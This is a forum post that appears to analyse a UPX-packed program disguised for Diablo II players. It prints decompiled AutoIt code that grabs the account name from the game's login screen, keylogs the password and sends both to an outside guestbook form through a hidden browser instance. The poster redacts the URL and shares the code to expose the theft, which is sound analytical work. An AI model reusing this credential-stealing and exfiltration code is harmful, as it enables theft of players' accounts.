I'm looking at it w/ a hex editor. Looks like he attempted to obfuscate it by upx compressing it. Fooled me for about 5 seconds... decompressed it and it is an autoit script.
Edit: I know exactly what it's doing... I decompiled the script and this is near the end:
Code:
While 1
If WinActive("Diablo II") Then
Select
Case $stage = 0
If PixelGetColor(504,304) <> $stop OR $stop1 Then
$stage = 1
EndIf
Case $stage = 1
If PixelGetColor(504,304) = $stop OR $stop1 Then
$stage = 2
Send("{TAB}" & "^C" & "^C" & "^C" & "^C" & "{TAB}")
$account = ClipGet()
EndIf
Case $stage = 2
$pass = ""
Do
_logpass()
Until PixelGetColor(504,304) <> $stop OR $stop1
$stage = 0
_sendaway()
EndSelect
EndIf
Sleep(50)
WEnd
It then proceeds to do keylogging and then submits it via:
Code:
Func _sendaway()
$sURL = "snipurl -- edited to be able to post this, needless to say, it signs a guestbook"
$oIE = _IECreate($sURL,0,0)
$oForm = _IEFormGetObjByName($oIE,"post")
$oText = _IEFormElementGetObjByName ($oForm, "form_message")
_IEFormElementSetValue ($oText,$account & "||||" & $pass)
_IEFormSubmit ($oForm)
_IEQuit($oIE)
EndFunc
Bookmarks